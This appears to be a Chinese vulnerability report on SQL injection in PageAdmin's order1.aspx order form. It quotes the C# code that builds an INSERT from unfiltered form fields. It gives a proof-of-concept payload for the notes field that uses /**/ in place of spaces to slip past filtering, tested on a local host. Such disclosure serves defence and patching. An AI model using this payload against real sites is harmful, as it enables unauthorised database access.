PageAdmin最新版sql注入

### 简要描述： http://www.pageadmin.net/soft/ 这里下载 最新版进行测试 最新版存在注入 ### 详细说明： 地址 ``` http://192.168.1.108/e/order/order1.aspx?s=1&table=product&id=28 ``` 文件 ``` order1.aspx ``` 主要源码如下 ``` using System; using System.Web; using System.Web.UI; using System.Web.UI.WebControls; using System.Web.UI.HtmlControls; using System.Data; using System.Data.OleDb; using System.Configuration; namespace PageAdmin { public class order1:Page { protected Repeater List,S_List; OleDbConnection conn; string UserName,Str_orderid,SendWay,sql; protected string SiteId,Table,Tongji,Tongji_Point; protected int RecordCounts; int SendSpending; protected void Page_Load(Object sender,EventArgs e) { SiteId=Request.QueryString["s"]; Table=Request.QueryString["table"]; if(!Page.IsPostBack) { Conn Myconn=new Conn(); conn=new OleDbConnection(Myconn.Constr()); Member_Check(); if(Request.Form["post"]=="add") { conn.Open(); if(IsNum(SiteId)) { Order_Add(); //跟进 } conn.Close(); } else { if(IsNum(SiteId)) { conn.Open(); Get_Total(); Data_Bind(); conn.Close(); } } } } //看这个函数 private void Order_Add() { string Name=Request.Form["name"]; string Tel=Request.Form["tel"]; string Province=Request.Form["Province"]; string City=Request.Form["city"]; string Email=Request.Form["email"]; string PostCode=Request.Form["postcode"]; string Address=Request.Form["address"]; string Beizhu=ubb(Request.Form["beizhu"]); //我们直接看这里吧ubb函数只是对空格进行转换 所以空格等下我们用/**/就不会被转义了 SendWay="待确定"; SendSpending=0; if(IsNum(Request.Form["sendway"])) { int SendWayId=int.Parse(Request.Form["sendway"]); Get_SendWay(SendWayId); } //生成订单号 Random r=new Random(); Str_orderid=System.DateTime.Now.ToString("yyMMddHHmmss")+r.Next(0,100); //下面存在注入 sql="insert into pa_orders(site_id,username,order_id,name,tel,province,city,email,postcode,address,beizhu,sendway,send_spending,operator) values("+SiteId+",'"+UserName+"','"+Str_orderid+"','"+Name+"','"+Tel+"','"+Province+"','"+City+"','"+Email+"','"+PostCode+"','"+Address+"','"+Beizhu+"','"+SendWay+"',"+SendSpending+",'')"; //这里存在注入了 OleDbCommand comm=new OleDbCommand(sql,conn); comm.ExecuteNonQuery(); sql="update pa_orderlist set state=1,order_id='"+Str_orderid+"' where state=0 and username='"+UserName+"'"; comm=new OleDbCommand(sql,conn); comm.ExecuteNonQuery(); SendMail(Email); string Mem_Order_Ulr="/e/member/index.aspx?s="+SiteId+"&type=mem_odidx"; conn.Close(); Response.Write("<script type='text/javascript' src='/e/js/order.js'></script><script type='text/javascript'>order_submit('"+Mem_Order_Ulr+"');</script>"); Response.End(); } protected string ubb(string str) { if(string.IsNullOrEmpty(str)){return "";} str=str.Replace("\r\n"," "); str=str.Replace(" ","&nbsp;"); return str; } } } ``` 对于insert型的注入 access版无法注入，SQL SERVER才行 而且需要普通会员权限 普通会员可以注册这就无所谓了 ### 漏洞证明： 本地进行测试 先访问 ``` http://192.168.1.108/e/member/index.aspx?type=login&s=1 ``` 登录 或者先注册 然后登录 接着访问 ``` http://192.168.1.108/e/order/order1.aspx?s=1&table=product&id=28 ``` [<img src="https://images.seebug.org/upload/201406/27225023afce5dd8e7fb30f7c247520721cc5d4d.png" alt="41.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/27225023afce5dd8e7fb30f7c247520721cc5d4d.png) 接着输入信息 报错注入 其他说明处输入 ``` 1','a',22,'');select/**/*/**/from/**/pa_member/**/where/**/@@version>0-- ``` 把空格换成/**/ [<img src="https://images.seebug.org/upload/201406/27225509c1e309433330bf391401bbb2b1eb62b9.png" alt="42.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/27225509c1e309433330bf391401bbb2b1eb62b9.png) 点提交订单 可以发现报错信息了 [<img src="https://images.seebug.org/upload/201406/272256178e70d6d3ffdc7ecda89d97f3e6c9a059.png" alt="43.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/272256178e70d6d3ffdc7ecda89d97f3e6c9a059.png)